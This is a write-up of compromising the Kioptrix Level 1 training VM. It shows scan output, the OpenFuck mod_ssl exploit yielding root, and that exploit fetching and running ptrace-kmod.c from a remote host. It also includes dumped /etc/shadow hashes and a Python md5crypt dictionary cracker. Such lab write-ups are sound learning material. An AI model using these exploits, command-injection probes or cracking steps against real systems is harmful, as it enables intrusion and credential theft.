【WriteUp】Kioptrix Level 1

Introduction

This is my revenge from a while back.

I tried taking on Kioptrix on my own.

Tools used

netdiscover

nmap

nikto

dirb

searchsploit

 

 

Reconnaissance

% nmap -sV -sS -p 1-10000 -T5 192.168.3.29

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-28 02:52 EDT
Nmap scan report for 192.168.3.29
Host is up (0.0031s latency).
Not shown: 9994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:DB:CD:D6 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.73 seconds

 

 

Running services

22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)

 

% dirb http://192.168.3.29


-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Mar 28 03:26:48 2020
URL_BASE: http://192.168.3.29/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.3.29/ ----
+ http://192.168.3.29/~operator (CODE:403|SIZE:273)
+ http://192.168.3.29/~root (CODE:403|SIZE:269)
+ http://192.168.3.29/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.3.29/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.3.29/manual/
==> DIRECTORY: http://192.168.3.29/mrtg/
==> DIRECTORY: http://192.168.3.29/usage/

---- Entering directory: http://192.168.3.29/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.29/mrtg/ ----
+ http://192.168.3.29/mrtg/index.html (CODE:200|SIZE:17318)

---- Entering directory: http://192.168.3.29/usage/ ----
+ http://192.168.3.29/usage/index.html (CODE:200|SIZE:3704)

-----------------
END_TIME: Sat Mar 28 03:27:24 2020
DOWNLOADED: 13836 - FOUND: 6

 

Valid web directories and pages

+ http://192.168.3.29/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.3.29/manual/
==> DIRECTORY: http://192.168.3.29/mrtg/
==> DIRECTORY: http://192.168.3.29/usage/
+ http://192.168.3.29/mrtg/index.html (CODE:200|SIZE:17318)
+ http://192.168.3.29/usage/index.html (CODE:200|SIZE:3704)

 

% nikto -h 192.168.3.29

 

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.29
+ Target Hostname: 192.168.3.29
+ Target Port: 80
+ Start Time: 2020-03-28 02:56:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ 8724 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time: 2020-03-28 02:56:39 (GMT-4) (39 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

 

Some of the vulnerabilities reported

+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.

and

+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

 

 → These are only possibilities, so each one needs to be verified separately.
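That verification step can be scripted. The following is an added example, not part of the original post and not nikto's own code: it parses the path-based findings out of nikto's text output and compares each one with a baseline request for a path that cannot exist, so a server that answers every unknown URL with the same page is not mistaken for a server actually hosting those backdoor files. The `fake_fetch` function and its responses are constructed for offline use; the `NIKTO_SAMPLE` lines are a subset of the scan output above.

```python
import hashlib
import re
from urllib.parse import urlsplit

# A subset of the finding lines from the nikto run above (the scan is the
# writeup's; the selection is for this example).
NIKTO_SAMPLE = """\
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ 8724 requests: 0 error(s) and 30 item(s) reported on remote host
""".splitlines()

# "+ [OSVDB-nnn: ]<path>: <message>" -- only lines that name a path on the target
FINDING = re.compile(r"^\+\s*(?:(?P<osvdb>OSVDB-\d+):\s*)?(?P<path>/\S*):\s*(?P<msg>.*)$")


def parse_nikto(lines):
    """Pull the path-based findings out of nikto's text output.

    Version findings without a path (the mod_ssl and Apache CVE lines) are
    skipped on purpose: those are checked against the banner and the advisory,
    not by requesting a URL.
    """
    findings = []
    for line in lines:
        m = FINDING.match(line.strip())
        if m:
            findings.append({"osvdb": m.group("osvdb"),
                             "path": m.group("path"),
                             "msg": m.group("msg")})
    return findings


def _normalize(body, path):
    """Blank out the echoed request path so two generic pages compare equal."""
    for piece in (path, urlsplit(path).path):
        if piece:
            body = body.replace(piece.encode(), b"<PATH>")
    return hashlib.sha256(body).hexdigest()


def triage(findings, fetch, baseline_path="/kioptrix-triage-baseline-9c1e2"):
    """Split findings into false positives and hits that need a human look.

    fetch(path) -> (status, body_bytes). The baseline request is for a path that
    cannot exist; a finding the server answers exactly like that baseline is
    the server's generic response, not evidence that the reported file exists.
    """
    b_status, b_body = fetch(baseline_path)
    baseline = (b_status, _normalize(b_body, baseline_path))
    out = {"false_positive": [], "needs_review": []}
    for f in findings:
        status, body = fetch(f["path"])
        same = (status, _normalize(body, f["path"])) == baseline
        out["false_positive" if same else "needs_review"].append(f["path"])
    return out


def fake_fetch(path):
    """Constructed stand-in for the target: a server that returns the same 200
    page (with the path echoed) for anything it does not know. Replace with a
    urllib/requests-based function to run this against a real host."""
    known = {
        "/manual/": (200, b"<html><title>Index of /manual</title></html>"),
        "/test.php": (200, b"<html><body>test page</body></html>"),
    }
    if path in known:
        return known[path]
    return (200, b"<html><body>Welcome! You asked for " + path.encode() + b"</body></html>")


if __name__ == "__main__":
    for bucket, paths in triage(parse_nikto(NIKTO_SAMPLE), fake_fetch).items():
        print(bucket, paths)
```

With the constructed server the three "backdoor" hits land in `false_positive` because they are answered identically to the impossible path, while `/manual/` and `/test.php` differ from the baseline and go to `needs_review`. A real target that returns a proper 404 for unknown paths is handled the same way: the baseline is then a 404, and any hit that is also a 404 is dropped.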

 

 

Based on the information above, attempt intrusion along the following lines:

1. From the nmap results, check for vulnerabilities in

111/tcp rpcbind 2 (RPC #100000)
139/tcp netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp status 1 (RPC #100024)

2. From the dirb results, check for vulnerabilities in

+ http://192.168.3.29/index.html (CODE:200|SIZE:2890)
+ http://192.168.3.29/mrtg/index.html (CODE:200|SIZE:17318)
+ http://192.168.3.29/usage/index.html (CODE:200|SIZE:3704)

3. From the nikto results, check for vulnerabilities in

the wp and PHP directories

mod_ssl

Intrusion

1. From the nmap results, looked up vulnerabilities for the following with searchsploit

111/tcp rpcbind 2 (RPC #100000)
139/tcp netbios-ssn Samba smbd (workgroup: MYGROUP)
1024/tcp status 1 (RPC #100024)

 → nothing useful found

443/tcp ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

 → found openfuck.c

2. From the dirb results, checked the following URLs for vulnerabilities

+ http://192.168.3.29/index.html (CODE:200|SIZE:2890)

 → confirmed Apache is running; no exploitable vulnerability found

+ http://192.168.3.29/mrtg/index.html (CODE:200|SIZE:17318)

 → confirmed MRTG is running; no exploitable vulnerability found

+ http://192.168.3.29/usage/index.html (CODE:200|SIZE:3704)

 → confirmed Webalizer is running; no exploitable vulnerability found

3. From the nikto results, checked the wp and PHP backdoor hits

 → all NG

From

mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

check the mod_ssl vulnerability (the same one as in 1)

Get openfuck and run the exploit

 

Running OpenFuck

Check the contents of the .c file for the build instructions and other notes

/*
* OF version r00t VERY PRIV8 spabam
* Version: v3.0.4
* Requirements: libssl-dev ( apt-get install libssl-dev )
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
* Note: if required, host ptrace and replace wget target
*/

 

As the header says, run:

% apt-get install libssl-dev

% gcc -o OpenFuck OpenFuck.c -lcrypto

 

The first argument selects the target box. Based on Apache 1.3.20 and Red-Hat Linux from the nmap results,

0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2

are the candidates for that argument.

% ./OpenFuck 0x6a 192.168.3.29 443

 → failed

% ./OpenFuck 0x6b 192.168.3.29 443

 → worked

 

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1$ ./OpenFuck 0x6b 192.168.3.29 443

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
...ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit;
--04:33:44-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

0K ... 100% @ 1.25 MB/s

04:33:45 (1.25 MB/s) - `ptrace-kmod.c' saved [3921/3921]

/usr/bin/ld: cannot open output file exploit: Permission denied
collect2: ld returned 1 exit status
gcc: file path prefix `/usr/bin' never used
whoami
root

 

We got root, so there is no need for privilege escalation.

Wait, is that it??

 

 

Exploration

Now that I'm inside the machine, check the /etc/shadow file

 

root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::
john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::
harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::

 

Grabbed the shadow entries for the three users, root included, and copied them locally.

Crack the passwords with John the Ripper.

For the wordlist I used rockyou.txt, which already ships with Kali.

% john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt

(On Kali the wordlist is installed as /usr/share/wordlists/rockyou.txt.gz and has to be gunzipped first; the last argument is the file the three shadow lines were copied into, shadow.txt here.)

 → Hmm, the cracking isn't going too well...
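The $1$ prefix on those three entries is md5crypt, the MD5-based crypt(3) scheme, which is what john selects for them automatically. The following is an added example, not part of the original writeup and not john's code: a pure-Python md5crypt following the FreeBSD/glibc reference algorithm, plus a dictionary check over the three shadow lines above. The wordlist here is a handful of constructed words standing in for rockyou.txt, and the `demo` entry with password `letmein` is made up so a successful match can be shown offline; the point is to show what the hash is and how a wordlist attack against it works, not to replace john, which is far faster.

```python
import hashlib

# The three /etc/shadow lines from the target (copied from the writeup above).
SHADOW_LINES = [
    "root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::",
    "john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::",
    "harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::",
]

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """crypt(3)'s base64 variant: emit `count` chars, low 6 bits first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password, salt, magic=b"$1$"):
    """md5crypt as in FreeBSD/glibc crypt(3). password and salt are bytes; salt is at most 8 bytes."""
    salt = salt[:8]
    ctx = hashlib.md5(password + magic + salt)
    # As many bytes of MD5(pw + salt + pw) as the password is long.
    alt = hashlib.md5(password + salt + password).digest()
    remaining = len(password)
    while remaining > 0:
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    # For each bit of len(password): a NUL byte for a 1 bit, the first password byte for a 0 bit.
    bit = len(password)
    while bit:
        ctx.update(b"\0" if bit & 1 else password[:1])
        bit >>= 1
    final = ctx.digest()
    # 1000 rounds of deliberately irregular mixing (the stretching step).
    for i in range(1000):
        rnd = hashlib.md5()
        rnd.update(password if i & 1 else final)
        if i % 3:
            rnd.update(salt)
        if i % 7:
            rnd.update(password)
        rnd.update(final if i & 1 else password)
        final = rnd.digest()
    # Output: digest bytes regrouped in the scheme's fixed order, 22 chars total.
    encoded = b""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        encoded += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    encoded += _to64(final[11], 2)
    return magic + salt + b"$" + encoded


def parse_shadow(line):
    """Return (user, salt, full_hash) for an md5crypt shadow entry."""
    user, hashed = line.split(":")[:2]
    if not hashed.startswith("$1$"):
        raise ValueError(f"{user}: not an md5crypt ($1$) hash")
    _, _, salt, _ = hashed.split("$", 3)
    return user, salt, hashed


def crack(shadow_line, wordlist):
    """Dictionary attack on one shadow line; returns the matching word or None."""
    _, salt, hashed = parse_shadow(shadow_line)
    target = hashed.encode()
    for word in wordlist:
        if md5crypt(word.encode(), salt.encode()) == target:
            return word
    return None


def demo_line():
    """Constructed entry with a known password so a hit can be shown offline."""
    return "demo:" + md5crypt(b"letmein", b"Ab3dEf9h").decode() + ":14513:0:99999:7:::"


if __name__ == "__main__":
    words = ["password", "123456", "letmein", "kioptrix"]  # constructed stand-in for rockyou.txt
    for line in SHADOW_LINES + [demo_line()]:
        print(line.split(":")[0], "->", crack(line, words))
```

Each candidate costs 1002 MD5 computations per user because the salt is folded into every round, so the same word has to be re-hashed for root, john and harold separately; that per-salt cost is the reason rockyou.txt-sized lists are best left to john or hashcat.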

 

That's all.